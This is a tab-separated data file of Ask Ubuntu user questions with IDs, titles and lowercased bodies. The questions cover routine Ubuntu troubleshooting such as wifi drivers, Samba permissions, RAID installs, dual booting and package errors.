243118	hybrid hibernate on ubuntu ?	after i saw windows 8 uses hybrid hibernation instead of shutdown by default in order to solve its slow startup issue , i want to know if it 's possible to use hybrid hibernation on ubuntu to speed up its fast startup ? if yes , how ? and does it really affect the startup time – for example 30 sec to 10 sec ?
243122	how to run app `` quietly '' on ubuntu vps via ssh	i have an ubuntu vps and i want to run an app through ssh but i want to do it `` quietly '' . i mean , when i for example start top , it is displayed in my ssh console and i do n't have access to my vps terminal line until i quit from top . i want to run an app and do n't get console output from it , i want to stay at the main ssh terminal command prompt .
243124	how to reinstall terminal ?	while fixing package dependencies , the terminal application went missing , and now i can not locate the application . is there a way to reinstall the terminal application ?
243126	ubuntu 12.10 on macbook pro 5,5 ( wifi issue )	i know this question gets asked almost every day with a different macbook version , but i ca n't seem to find anything definitive for a summer '09 mbp ( 5,5 ) . i installed ubuntu 12.10 and wifi wo n't work . i am very new to ubuntu , so i need some guidance as to how to troubleshoot this . on a side note , i have followed several other guides and i have verified that there are some broadcom drivers installed , but i 'm not sure if they are the right ones . so , i suppose my two questions are as follows : 1 ) what steps would you take to begin resolving this issue of missing wireless 2 ) is it possible that , if i installed xubuntu ( i like its gui more ) , i would n't have this same issue ? thank you , in advance , wes my wireless adapter is : bcm4322 802.11a/b/g/n wireless lan controller ( rev 01 )
243130	12.10 cinnamon problems	i have just installed 12.10 , but my graphic card does n't support unity ( 3d ) and i installed cinnamon . my problem is that when i go to open cinnamon it 's like gnome ( when i go to gnome there is the same , no changes ) . it 's not like cinnamon and when i try to put something in the desktop i ca n't . my question is , how can i do for make cinnamon run ?
243133	how to set 1440×900 screen resolution ?	i have an asus wide screen on a dual boot machine . in windows screen resolution is 1440×900 , but in ubuntu the only settings available are 1424×768 or less . is there a way to change this ?
243139	how to add aplication to startup application menu ?	i tried add some applications to add startup menu . but they did n't started with computer . please anybody help me to do that . i used only gui method to add apllications to menu in ubuntu 12.04.somebody please help me to do that correctly . forget about my bad english .
243140	what to do when system locks up	let 's say the entire desktop freezes and nothing 's responding ... in windows i 'd just hit ctrl+alt+del then find the application that 's `` not responding '' and close it , or try ending processes until the system comes back to normal . what would be the equivalent in ubuntu ? is there a sort of task manager that can be used for this , or do i have to go through cli for this ? what would be the commands for doing what i mentioned earlier ( listing and closing running apps+processes ) ?
243143	can wubi use the iso i already have ?	the windows installer for ubuntu desktop instructions say that an iso image for ubuntu is downloaded during the installation process . but what if i already have an iso image for ubuntu . can i make the windows installer use that , so it does n't have to download an iso image again ? 12.04 lts and 12.10 are the versions of ubuntu i 'm interested in installing , in case that matters .
243147	ubuntu one for mac os x proxy detection ?	since new version of u1 ( 4.0 ) , it 's been claimed that it can read os proxy settings . but in my case it did n't . i have my network settings set to `` auto proxy discovery '' . and browsers , mail and other apps are working fine . i had to configure proxy settings for dropbox manually ( it has such configuration ) . but how can i configure u1 proxy manually ? if it for some reason ignores auto proxy settings .
243152	lubuntu/ubuntu 12.10 wo n't recognize usbs	i 'm running lubuntu 12.10 and everything was going fine until yesterday . whenever i try and use an sd card or usb stick/usb hub it wo n't recognize it in the file manager . i ran lsusb which recognized the kingston datatraveler usb that i 'm trying to use , but when i ran ls /dev/sd* it came up with /dev/sda /dev/sda1 /dev/sda2 /dev/sda5 with the usb stick still in . i took the usb stick out and tried it again and came up with the same results .
243155	why am i getting this error when updating after a partial upgrade ?	i was prompted for a partial upgrade and i completed it . during this , vlc was removed . when i try to reinstall it i get this : isuru @ isuru-desktop : ~ $ sudo apt-get install vlc reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : vlc : depends : vlc-nox ( = 1.1.13-1~ppa1~lucid1 ) but it is not going to be installed recommends : vlc-plugin-notify ( = 1.1.13-1~ppa1~lucid1 ) but it is not going to be installed recommends : vlc-plugin-pulse ( = 1.1.13-1~ppa1~lucid1 ) but it is not going to be installed e : broken packages isuru @ isuru-desktop : ~ $ sudo apt-get install vlc-nox reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : vlc-nox : depends : libavformat52 ( > = 4:0.6-1~ ) but it is not going to be installed or libavformat-extra-52 ( > = 4:0.6-1~ ) e : broken packages
243156	skype disconnects my wireless	skype 64 bit disconnects my wireless connection when i start it , i 'm using ubuntu 12.04 lts any suggestions thanks
243159	how can i force chrome to save email passwords ?	i am running ubuntu quantal ( 12.10 ) with chrome ( not chromium ) installed via terminal . unfortunately , when it comes to mail automatic log in , for some reason chrome does n't offer to save passwords , which is really frustrating if one uses mail a lot , i do not want to write my username and passwords every time i check my mail . looked everywhere and i ca n't find a solution .
243162	problem - ubuntu 12.10 + jdk + netbeans	hey guys i downloaded the latest version of netbeans from their site . also downloaded latest jdk from oracle . installed both of them but whenever i am opening netbeans and trying to create a new project its giving me this jdk error http : //s13.postimage.org/5ahdmdq3b/screenshot_from_2013_01_14_22_03_43.png system not allowing me to post images so here is the link . while jdk has already been installed . please help me . thanks
243164	keyboard is n't working in grub after putting computer back together	i have a 2006 macbook ( black ) , intel core 2 duo and 2gb ram . recently while cleansing the inside of dust with a hint of compressed air , i had removed the hard drive , the ram , and the screws securing the case in place . upon replacing all of the above i was met with the grub menu . i simply hit enter to select ubuntu , but nothing happened . i came across that the keyboard was not working . i know that the keyboard is not damaged , the power button works and it 's on the same connection as the keyboard to the logicboard . i read extensively on how to enable my keyboard , and i attempted to use an external usb keyboard with no avail . with out the bios readily available since it is a macintosh brand computer , i can not enable legacy usb support . with the cd drive enabled it automatically boots to cd over the hard drive , but again once asked to either `` try '' or `` install '' ubuntu , the mouse no longer works and the keyboard is also inactive . could the problem here be software , or is it more likely hardware ( torn ribbon ) ?
243175	12.10 and a slew of computer component issues	problem : installed ubuntu 12.10 and everything went fine the first time . upon reaching the desktop all 4 of my monitors were working and of course out of order , which is no problem . immediately i noticed extensive lag , going to the unity bar to go to displays it would stagger , and in my case with the specs of my pc i would of expected a smooth fast ride . so instead of fixing the display i went and did all the updates and then rebooted . after coming back it still had the same issue , so i went and checked the update software and checked to see what driver it was using for my gtx 680 , i tried all 5 of the options there and rebooted 1 at a time . not a single one worked at all . all the others either broke compiz and no windows or i did n't even have monitors . only the default one would work , but as mentioned caused serious lag but no screen tearing . so i decided to put the screens in order , upon doing that it would n't work correctly at all , the screens would n't even move , and if i got 1 to move it got stuck there for good . i tried reinstalling 3 more times , all other times it just failed to do any different . question : seeing 12.10 is new would it be better for me to try 12.04 is there going to be any fix from that lower edition , i figured 12.10 had better compatibility fixes . computer : running 4 monitors case : corsair obsidian 800d motherboard : gigabyte x79-up4 lga 2011 socket mobo additionals : gigabyte pci-e 802.11 b/g/n + bluetooth cpu : intel i7-3930k 3.2 ghz 12mb lga 2011 not overclocked gfx : nvidia msi 2gb gtx 680 memory : corsair vengeance 2133mhz 16gb rom drive : lg 12x blue-ray player and dvdrw combo drive thermal display : nzxt sentry lx aluminum dual bay digital fan control cooling : corsair hydro series h60 120mm liquid cooling ssd:128gb sandisk sata iii 6.0gb/s ssd < -- -where ubuntu was installed data drive : 2tb sata iii 6gb/s 7200rpm 64mb cache 3.5 '' hd media reader : 12-in-one internal card reader power supply : coolermaster silent pro gold 1000w power supply
243179	will windows 8 be a problem ?	i am in need a of a new laptop soon and most of them for sale look to have windows 8 on them . i would like to just wipe it off and install ubuntu 12.10 on the laptop . will the win8 secure boot stuff be a problem for me at all ? thanks for the help !
243181	ca n't find gmail webapp ?	i 've updated from ubuntu 12.04 to 12.10 and when i started firefox , i was prompted by an oh-so-normal-looking help dialog ( appeared at top right of the browser window ) , with a question with the words , `` would you like to install gmail '' and `` for extra features and quicker access ? '' ( it might have read , `` would you like to install gmail to ubuntu for extra features and quicker access ? '' but i ca n't recall for sure . ) i clicked ok . nothing happened . now i do n't know what i did . there is no new add-on showing in firefox 's list . a google search only turns up links to a suspicious web site . how can i find out if i 've installed something malicious ? edit [ solved ] : okay , it 's a webapp . it does not show up in the ubuntu software center when you search for 'gmail ' . however , if you search the ubuntu software center for 'webapp ' i found there were webapps for amazon and ubuntu one music installed ( caption : `` unity webapp integration scripts '' ) . i selected remove , and sure enough , `` to remove amazon , these items must be removed as well : '' `` unity-webapps-gmail '' . remove - > `` problem '' solved .
243186	failed to authenticate	i deleted my password after i had set it as a black field , i could n't authenticate when installing software . i went on line asking how to get it back i got a way of doing this by booting using a live cd and deleted the code from the shadow file but now when i reboot my computer the administrator user says failed to authenticate . any with a help please . am running 11.01 on an hp- ( compaq nc6120 )
243190	samsung rv509 wo n't detect my nvidia geforce 315m in ubuntu 12.10	i do n't seem to have an xorg.conf file . my system is a samsung rv509 with an nvidia geforce 315m . how can i get my nvidia driver working correctly ?
243191	how to reset configuration for compiz for another user ?	after modify something in cssm the display manager in mypersonalaccount does n't work . so i login in my root account and it is fine but i want to reset the compiz configuration of mypersonalaccount to default , as i ca n't even open terminal using ctrl+alt+t in mypersonalaccount . how can i reset the compiz ( cssm ) configuration for a specific user from the root in ubuntu 12.04 ?
243196	how to rescue ubuntu from windows	i deleted the ubuntu [ 12.10 ] partition by accident from windows 8 . i tried everything i saw on internet , but still i could n't make it . is there a way to rescue ubuntu from windows 8 ? edit after eliah 's post actually my first problem occured when i restarted the system , there was `` no such partition grub rescue > '' problem , so i tried to fix that . first i tried ubuntu livecd , i wrote necessary commands of testdisk and gpart to terminal , but it did n't work . then i tried the `` boot-repair '' , it worked great . now i can log into windows 8 , but i just ca n't figure it out how to rescue my ubuntu . actually , i generally put my documents to dropbox , but i had some very important python scripts and large files located in ubuntu 's home folder , and i customized ubuntu for very long time , i really want to rescue ubuntu , my last choice is starting over . edit 2 after eliah 's post my sudo fdisk -l output : device boot start end blocks id system /dev/sda1 * 2048 3074047 1536000 7 hpfs/ntfs/exfat /dev/sda2 3076094 251176274 124050090+ f w95 ext 'd ( lba ) /dev/sda3 251176960 488408129 118615585 7 hpfs/ntfs/exfat /dev/sda5 23551353 116647964 46548306 7 hpfs/ntfs/exfat /dev/sda6 149452758 251176274 50861758+ 7 hpfs/ntfs/exfat output of parted -l error : ca n't have a partition outside the disk ! ` warning : unable to open /dev/sr0 read-write ( read-only file system ) . /dev/sr0 has been opened read-only . error : ca n't have a partition outside the disk ! `
243197	why ca n't i disable the guest session ?	i ca n't disable the guest session for ubuntu 12.04 . i tried to add allow-guest=false but it does n't work . is there another way to disable it ?
243203	ubuntu phone for nokia n9	will ubuntu for phones work on nokia n9 ? as you might know , nokia n9 runs meego ( linux based ) but it was completely abandoned since windows 8 nokias . it is a great phone , but the os has and `` alpha '' feel . if ubuntu for phone will be available for nokia n9 , i think most users will switch to ubuntu .
243207	how to run pidgin and login automatically on startup	how to run pidgin minimized to panel and login automatically with the enabled accounts at startup . i am using pidgin 2.10.3 on ubuntu 12.04 .
243208	how do i control the fan when running kernel 3.7 ?	a while ago i started to use thinkfan to control the fan speed of my lenovo thinkpad . this became necessary as it stoped working after a kernel update ( i think it came with the installation of a v3.7 kernel with xorg-edgers ) and i got thermal errors which crashed the system . then , with thinkfan installed , my system worked for months . but since yesterday after an update of xorg-edgers ( please do n't ask my why i have to use that , i really have to ) i got thermal crashes again . at the same time the fan started to make some noise ( not that it was running fast , probably rather too slow ) . obviously thinkfan stoped working with the new kernel . any information available about fan control in recent kernels ? maybe the acpi report of the temperature is wrong now ? the thinkfan configuration is as described in http : //thinkwiki.de/thinkfan ( it did n't change with the update i think ) .
243210	why do i get this warning from gnome keyring in xubuntu ?	i have installed xubuntu-desktop ontop of a stock ubuntu installation . when using ssh , or more specifically git , i always get this warning warning : gnome-keyring : : could n't connect to : /tmp/keyring-ivaedo/pkcs11 : no such file or directory i have done a fair amount of googling to disable/enable the proper services at boot time , but so far i always end up with this error . any insight on completely removing gnome-keyring , and it 's downfalls , or integrating gnome-keyring into xubuntu/xfce would be awesome .
243211	why is ubuntu telling me my drive is full ?	i installed a fresh copy of ubuntu on a 500gb drive however , yesterday as i was downloading some stuff to my downloads folder i got the message that i do n't have enough space . when i checked the properties on the folder it told me i had only a few kb 's left . how is this possible ? it 's a 500gb drive and currently apart from the ubuntu install there 's only a few gb of stuff on the drive . more importantly how do i fix it ?
243219	ubuntu 12.10 xbmc audio output with echo effect	i recently installed ubuntu 12.10 on one of my machines that i am planning to use as htpc . it has galaxy geforce gt-610 . i connected my machine to sony str-dn1030 receiver as input and output from the receiver goes to epson 3010e projector . i installed xbmc latest release candidate ( i believe rc3 ) and setup the audio output to hdmi sony avamp and pass through output to hdmi sony avamp . i set up the sound input as hdmi and speaker as 7.1 . i can hear sound from all 7 speakers and sub woofer but i also hear the sound coming from the projector . this is causing a little echo effect . i would appreciate if someone let me know how i can resolve this issue . thanks in advance .
243226	how to remove omgubuntu web app from ubuntu ?	i tried using methods found in different posts on this forum , but they do not work because my system tells me that that app is not installed . any help ? edit : ** just now i installed ubuntu vibes web app , and it points to a wrong page when clicked and now i ca n't remove it xd
243227	gstreamer videosink configuration error when playing videos with parole	i ca n't play videos with parole . theres is a gstreamer error ( videosink configuration ) . i 've also installed restricted extras and vlc and i still ca n't play movies . i 've no problem playing audio files . any ideas ?
243229	how to add in-app advertising ?	i 'd like to code something cool for the ubuntu software center . i 'll release my app for free , but i 'd like to add some in-app advertising . is it possible ? how can i do that ? is it hard ? thanks to all developers here around ; )
243235	is there a way to tell how a program in synaptic was originally installed ?	i 'm running rstudio . there 's an update available , but the update is n't in synaptic . synaptic is aware of rstudio , however , and shows that it is installed . i think i may have installed it initially by downloading the .deb , but i 'm not sure . there 's no indication in the properties for the package . is there another way to tell ?
243236	why is my ubuntu usb failing to boot ?	computer is a lenovo t400 windows vista if i open the usb created by using startup disk all files display correctly so i 'm sure the ubuntu persistent usb was created right but lenovo t400 seems to report no usb found very strange now would this be a question for the lenovo forum just want to be sure before i go to there forum that if it is indeed a wrong created usb of ubuntu or is the lenovo laptop to blame here ?
243237	why do the sound levels change in xbmc ?	i reset the sound level in sound in application levels and as soon as the song ends it goes back to the prior setting i.e . too low never had to raise the level before . taking the spdif out to a outboard dac songs within the same album any input would be great thanks
243239	is synaptic better than the software center ?	please forgive me for this novice question . most old experienced users of ubuntu says that synaptic package manager is the best way of installing software on the ubuntu systems . is it because the granular control that synaptic provides to it 's users for installing the software ?
243241	why did my ubuntu installation fail ?	i tried cleaning the partition which had ubuntu installed ( but was corrupted somehow and i wanted to reinstall ) - i used gparted for it . after deleting the partitions which contained ubuntu ( i had another partition for windows ) , i tried re-installing ubuntu 12 - however , the installation failed complaining that there was no /dev/sda . when i tried gparted again via live cd , its unable to find any devices on the computer . i will run disk utility to gather more information - any other thoughts that could possibly help me get to the point where i can re-install ubuntu on my computer . i noticed the option for reformatting on disk utility but i have not tried it yet . edit : i am assuming that i may have corrupted/deleted the ntfs partition somehow since i am unable to see any deviced on gparted now . i am not entirely sure whether i should try format volume or drive via dis utility . i will try running a bad blocks check as well . thanks in advance update : i can neither format drive nor volume using disk utility - it complains about `` daemon is inhibited '' . update : when i tried running benchmark drive performance , i received the following error : error benchmarking : helper exited with exit code 1 : error reading 104857600 bytes at 104857600 from /dev/sda when guesstimating buffer size : input/output error update : gparted was already running and possibly holding onto a lock . when i closed it , i was able to format the volume . update : after formatting , i had issues with the ext4 filesystem . i tried formatting it again - got the error ( approximate ) below - any thoughts ? mke2fs : could not erase sector2 - short read could not erase block 0 - short read could not erase sector 0 - short read
243246	how can i join an ubuntu client to a windows domain ( server 2008 )	i need to add ubuntu 12.10 client to windows server 2008 . i tried several commands but they did not work . my client could not join . actually the join starts ( in my server i got the client computer name ) but client ubuntu did not ask for the domain user name , login is only local . i tried those command for joining : sudo apt-get install likewise-open5 sudo domainjoin-cli join mydomain.com administrator after this command my system had not joined the domain . note : am install dns server only before give this command i need to give static ip address manually ? ? ? ? ? ?
243247	why is samba not allowing write access for ad users in a local group ?	i 've configured samba 3.6.3 to use ad on my ubuntu box . the configuration seems to be correct , commands like getent group , getent passwd return groups and users from ad . i can grant ad user permissions on folders and using sudo that user has access . however , when going through samba the user has no access to the folder . here 's some test code . first just testing winbind and the linux permissions : sudo mkdir /tmp/test sudo chown root : sambashare /tmp/test sudo chmod 775 /tmp/test sudo usermod -g sambashare dom+user1 sudo -u dom+user2 touch /tmp/test/file touch : can not touch `test/file ' : permission denied # good because dom+user2 is not in sambashare group sudo -u dom+user1 touch /tmp/test/file # success ! ls -l /tmp/test -rw-r -- r -- 1 dom+user1 dom+domain users 0 jan 14 16:53 test/file now configuring samba share [ test ] path = /tmp/test writable = yes follow symlinks = yes valid users = dom+user1 , @ sambashare the directory is visible to the user . but creating new directory or file is not allowed . if i change linux permissions : chown dom+user1 /tmp/test i can write to the samba share from windows . note that i have n't added a write list to samba or anything else , just the user ownership on that share in linux . and linux was allowing the user to write to that folder before based on group permissions . i 've tried opening the share from windows 7 box , and ubuntu box via go - > open location - > smb : // . same issue . so i do n't think it 's windows . anyone know what 's going on ? edit i 'm trying to group domain users by local groups and allow access to certain shares , so i do n't have to bother ad admins to create custom groups . also i want to use filesystem permissions instead of samba write lists . it 's cleaner and samba is not the only service . mapping a domain group to a local linux group is n't what i 'm trying to achieve . so for example locally i create local dev_team1 , dev_team2 groups . add dom+sally to dev_team1 and dom+john to dev_team2 , then set filesystem permissions using acl . i thought this configuration was possible because winbind is mapping domain groups/users to a range specified by samba : idmap config * : backend = tdb idmap config * : range = 20000-999999 and when you execute getent group ; getent passwd you get a list of domain groups/users with id > 20,000 . so based on that i assumed samba authenticates the user , assigns them one of the ids , and it does n't matter if id 20,000 is in a local group 500 , or part of domain group 21,000 . guess not ...
243249	how to keep launched programs confined to their desktop ?	this may sound a little pointless , but being able to do this would make a world of difference to me . call it ocd , and you 're probably right , but , but ... ! so ; i was wondering if there is some obscure compiz setting , or any modification i can do , so that in a unity3d environment , programs i launch start up at the same desktop they 're launched . it might not be too clear so let me elaborate with an example : my job requires me to multitask a lot . i 'm constantly opening different edition programs which take a while to load . the way i do it is i usually switch to the next desktop , open the program there and switch back to whatever i was doing . the problem is that after loading is over , the program i launched will appear in the `` first '' desktop , interrupting my work . i wish i could be using desktop 1 to work , switch to desktop 2 , launch an application , and have it pop up on desktop 2 when it 's done loading , regardless of my current whereabouts . any way to do this ? thank you very much .
243251	why does the screen refuse to lock after i installed lxde ?	i have a computer , i think it 's running gnome ( it 's running whatever the default is ; i have the unity panel , ) and i installed lxde for use on another user , but after installing lxde , it will no longer lock the screen due to inactivity , or for any other reason . when logging in , i have to enter my password , just like normal , but the screen can not lock . wait 5 mins ( my setting , have verified this , ) still unlocked . press ctrl-alt-l , no response . even going to the gear and choosing `` lock screen '' has no result . even after deleting the second user account ( just on a hunch , ) the screen still can not lock . what do i need to do ?
243256	does ubuntu come with java installed already ?	if so how do i disable it ? whats a good easy to use anti-virus protection that my parents can use ?
243257	chmod and chown a remote ntfs filesystem both fail	our ubuntu server 12.04 system has a remote ntfs filesystem mounted via samba at /media/blarg . one of our users had problems writing to the remote system , but not reading from it . since the auto-mount script we 've set up has a different user ( we 'll call it sagaba ) mounting the remote system , i figured i 'd change the permissions for /media/blarg to 774 sagaba : sagaba , and make our user a member of the sagaba group , so he can go about his business . unfortunately , when i attempt this ( even as root ) , i get a permission denied error . chown : changing ownership of `/media/blarg ' : permission denied does this have to do with root squashing ? i ca n't understand how it would , since the mount point is a directory on the local system .
243262	when i have headphones in my computer and i unplug them the sound ( speakers ) does not work	sometimes i leave my headphones in my computer after shutting off my computer , when i come back to it i forget that my headphones are plugged in , which is fine , the strange part is if i unplug them later , i get no sound from my speakers . anyone have any idea why this might be happening and how to remedy it ? thanks
243265	how to automount hdd without causing freeze when missing ?	i used to add external usb hdds as automounts in /etc/fstab , but sometimes i remove them ( or they fail ) rebooting the server fails since they wo n't mount . is there a way to automount system hdds if they exist , but do n't hold up the boot process if they 're not there ? it is absolutely imperative that the machine be able to reboot properly because i ca n't physically access it easily .
243268	a quick-to install , full version of ubuntu for class purposes ?	i 'm a computer teacher and want to install ubuntu in my class ( on a temporary hard disk ) . now , to install ubuntu , it takes a while , but i do n't want them to just look around in ubuntu from the disk . i want to let my pupils install ubuntu , and let them see what it is to install another operating system as windows . the only disadvantage is that installing ubuntu takes a while . after it 's been installed , my class is all ready over for quite a while . is there any quicker way to let them install ubuntu , and than subsequently also let them discover the operating system of course ?
243269	how do i search a folder for all zip files , unzip them , then 7-zip the root folder as 1 large zip ?	i have a problem . i need to compress a root folder , but it has a lot of zip/bzip/tar files in its subfolders . can someone show me a script that will search and unzip each subfolder 's zip file and then 7-zip the root folder with maximum compression ?
243270	can i use virtualbox to install ubuntu linux on windows ?	i wanted to use linux , but keep windows 8 ; so is it possible to have run both os 's on one pc ?
243273	finger-print-gui and lenovo x220 fingerprint reader issue	in part related to does lenovo fingerprint reader work in ubuntu ? i did follow the several instructions one can find on here and elsewhere . i succeeded also in enrolling my index finger with the gui and with running pam-uth-update activated the fingerprint-reader for login or sudo commands whenever i now boot the machine or give sudo commands i get a command shown to identify with my finger . the led of the fingerprint-reader also shortly lights up and then goes off . sometimes logging in like that works most of the times it does not work i am sure this has to do with the led being on for short moment only . but why ? ? any log to check ? ? btw : works fine in windows 7 so hardware is okay and lusb also shows my reader is supported by finger-print-gui
243277	how to remove leftover unity-webapps-facebookmessenger icons ?	i have uninstalled unity-webapps-facebookmessenger but i have left over launcher icons in the dash and message menu . i have removed the facebook.com entry from allowed webapps domains in dconf-editor . how can i get rid of this annoying facebook icon in my message menu ?
243290	how can i dual boot ubuntu and windows 7 if i did n't create logical partitions ?	so this problem may sound familiar to a dozen other questions like these but i still have n't found an answer to mine in particular . when i installed ubuntu i thought that when choosing to install it side by side with windows it would just add it to the windows booter , but it did n't . and now i 've got the problem that i recovered the mbr with my win 7 disc because i still use that a lot , and i would like to be able to boot ubuntu from that now . here is where the problem comes in . my problem is that since i did n't make a seperate boot partition for grub , i did n't think of making logical partitions ( i 've got 4 primary partitions , with the one with ubuntu on ) and i need to make it extended so that i can free some space up for the boot partition so i can then configure the win booter to boot it correctly when i choose to . and why i am just not deleting the whole partition to reinstall it ( because i guess you 're thinking that since it 's such a fresh install why do n't i just reinstall ? ) is because i have spent two days installing software and downloading and the only internet i have is a mobile broadband with limited bandwidth/month . i 'm looking for a way to copy the content which is around 5 gigs to some other drive , or somehow making it an extended drive and shrink it , or erasing the partition , doing this and that , copying it back and then installing grub . would this be possible ? would grub be able to pick it up if i were to install it through some other way ? right now i 'm on the live cd .
243294	cross compiling for m68000 ( embedded system )	how do i cross-compile for a motorola 68000 ? the gcc main pages list gcc -m68000 as an option http : //gcc.gnu.org/onlinedocs/gcc-4.0.4/gcc/m680x0-options.html # m680x0-options , but when i do gcc -m68000 test.c it wo n't work ( unknown option ) . in the past when i cross-compiled i used avr-gcc or msp-gcc , each needing a separate package to be downloaded , but i do not see the like for the m68000 . any ideas ? thanks
243299	is there any sound desk software for ubuntu ?	a friend of mine is looking at putting on a small-scale dance show at a local pub . she has hired a few lights and a pa system with a mixing board . all her music is done through either an mp3 player or a laptop . when i was in a show a while back , the sound dude was using a linux-based laptop to play samples off , essentially it played a sample the instant he clicked on a button on the screen . from memory , the software 's gui consisted of a number of large blue ( although the color is probably modifiable ) squares . does anyone know what this might have been ? if not , is there anything similar anyone could suggest ( excluding of course , banshee and rhythmbox - which i will probably use if it comes down to it )
243300	how do i change nautilus 3.6 symbolic icons ?	i have the new nautilus 3.6 installed and the new symbolic icons for home and trash do n't fit with the rest of my icon theme . how would i be able to change these icons ? is there a certain name i must give to the files i want in my theme ?
243305	how can i solve my raid installation problems ?	trying to install ubuntu server 12.10 64-bit ( also tried 12.04.1 64-bit lts ) with a raid5 array but machine does not boot grub ( i get the black screen with the blinking cursor ) , and i have tried hardware : four 2tb sata drives ( no hardware raid ) intel server board s1200bt w/xeon e3 1200 8gb ram i have tried numerous resources , and the advanced installation docs from ubuntu ( which i followed ) did not work as i expected . here are a few of the ways i partitioned and created softwareraid for install , i used the manual partitioning tool in the ubuntu server setup : raid5 device # 0 : 9gb swap , raid5 device # 1 : ~6tb ext4 / raid1 device # 0 : 1gb ext4 /boot , raid5 device # 1 : 9gb swap , raid5 device # 2 ~6tb / i have also tried putting /boot with the 'bootable flag = on ' on drive 0 , then using the setup listed in # 1 above . i ca n't seem to find anything relevant in the bios that might help this either , there are no settings or information regarding raid . can anyone provide assistance ? i am a novice at raid and intermediate with linux .
243308	how can i troubleshoot strange mouse behavior ?	i have an annoying problem on xubuntu 12.10 . i have a gigabyte gm-m6800 mouse . i can not really confirm , but it seems that this started happening with the 12.10 release of xubuntu where i have my mouse sometimes just go crazy and go to the left-bottom of my screen and stays there . the mouse works really well otherwise . some details that might be relevant : laptop with additional monitor attached to the right touchpad continues to work , however it 's being `` pulled '' by the left-bottom `` center of gravity '' created by the issue . that is , when this starts happening , it i can see the pointer when i move it with touchpad , however it gets pulled to left-bottom very quickly going to setting manager , mouse and touchpad and unchecking enable this device for my mouse ( says hid 04b4:0033 ) stops it from pulling the pointer to the left-bottom , however after re-enabling the device , it continues to exhibit the same problem mouse is attached directly to the laptop ( i.e . no additional usb hubs ) after unpluging the mouse and plugging it back , the problem disappears some more info : $ uname -a linux aclap 3.5.0-21-generic # 32-ubuntu smp tue dec 11 18:51:59 utc 2012 x86_64 x86_64 x86_64 gnu/linux $ lsusb ... bus 004 device 002 : id 04b4:0033 cypress semiconductor corp . mouse ... my questions : any idea why this might be happening ? is there a way to reset the mouse ( or any usb device , for that matter ) ? i.e . to simulate usb unplug / plug in software only ? are there some xwindow-related commands to manipulate the device that might help ?
243310	can i develop ios games on ubuntu ?	can i develop for ios on ubuntu ? i was told that since it was unix based , that i could develop for ios on linux . but can i also upload ios games to the apple 's app store on linux ?
243313	why is google chrome displaying artifacts in youtube ?	since installing 12.10 , chrome has been displaying bizarre colored artifacts over youtube videos , i can still watch the videos , but it 's more than a little irritating . i 've installed chromium , and there is no problem there . i assume then , that it is an issue with the built in flash plugin that comes with chrome . here is a picture of the colored artifacts : any help appreciated .
243314	wi-fi is unable to connect	the wi fi at my house can connect on my windows partition , but not on ubuntu . on all flavors . i have a comcast service , and im using a netgear router . ( a relatively new one . )
243317	ca n't update 12.10 anymore ? `` failed to fetch cdrom '' error	i get the following message trying to update ubuntu ; failed to download repository information details w : failed to fetch cdrom : //ubuntu 12.10 _quantal quetzal_ - release amd64 ( 20121017.5 ) /dists/quantal/main/binary-amd64/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms , w : failed to fetch cdrom : //ubuntu 12.10 _quantal quetzal_ - release amd64 ( 20121017.5 ) /dists/quantal/restricted/binary-amd64/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms , w : failed to fetch cdrom : //ubuntu 12.10 _quantal quetzal_ - release amd64 ( 20121017.5 ) /dists/quantal/main/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms , w : failed to fetch cdrom : //ubuntu 12.10 _quantal quetzal_ - release amd64 ( 20121017.5 ) /dists/quantal/restricted/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms , e : some index files failed to download . they have been ignored , or old ones used instead .
243318	how to install lubuntu desktop environment and only the desktop environment ?	i have a slower computer that i would like to use the lubuntu desktop environment with . however , i do not want to install any of the software that is not related to the desktop environment . i am talking about programs like abiword and lubuntu software center . how do install the desktop environment and the desktop environment only ? also , if someone could point me in the right direction for research , when i use multiple desktop environments , i notice that certain elements of one desktop environment ( e.g . scrollbars , color schemes , program themes ) are present no matter which desktop environment i log into . is there a fix for this ?
243323	can i install ubuntu on my samsung galaxy tab 2 gt-p5113 ?	hi is there a way to install ubuntu on my samsung galaxy tab 2 10.1 '' model # gt-p5113 i wanted to use the nexus 7 intaller but it requires `` fastboot '' but my tab does not have fastboot as it has a ti omap processor not a tegra . so is there a manual method to get the same result as the nexus 7 ? my device does support odin flashing and clockwork mod..
243326	can i install ubuntu with a new blank hard drive ?	i am planning to install a new blank hard drive on my computer but i can not find the windows iso file i need ( windows 7 starter ) so can i just install ubuntu instead when i put the new hard drive in ? i dont have a cd/dvd rom reader on my laptop . i can only install from usb stick . and no windows 7 starter 's iso file can not be found anywhere ! windows 7 starter is only preinstalled in computers , and yes i already contacted microsoft and they disagreed to give me it .
243330	ubuntu maverick meerkat 10.10 repository mirrors go offline ! what now ?	is there a ubuntu 10.10 maverick meerkat software repository mirror that is still online and has all the packages ? and , i would like to know what is the size of all the packages for meerkat . i am still using ubuntu 10.10 maverick meerkat . there are several reasons why i can not upgrade to newer versions of ubuntu . although it was decided that meerkat repository mirrors will be delted by april 20 , 2012 , they were still online until recently . now , almost all of the mirrors have removed the downloads . right now , there is only one mirror in indonesia ( http : //dl2.foss-id.web.id/ubuntu/ ) which is working . it still does not have all the files .
243331	does not finish booting from usb	while following the instructions here ( either 12.10 or 12.04 ) it begins good . brings up the selection menu to boot from usb or to install . then starts booting fine but never finishes . it gets stuck on the purple screen with the ubuntu logo . the progress dots freeze . if i leave it , after a while , the screen gets mangled with random boxes as if the graphics card is going bad . this is on a asus g51j ... should i assume there is some type of a driver issue ?
243334	where do i find my bookmarks in my old homefolder and where do i put them in 12.04 ?	i would have just upgraded but everything fell apart during the process . i think i saved everything off the drive . now i 'm trying to put it back together with 12 . where can i find my bookmarks in 10.04 , and where do i put them in 12.04 ? thanks
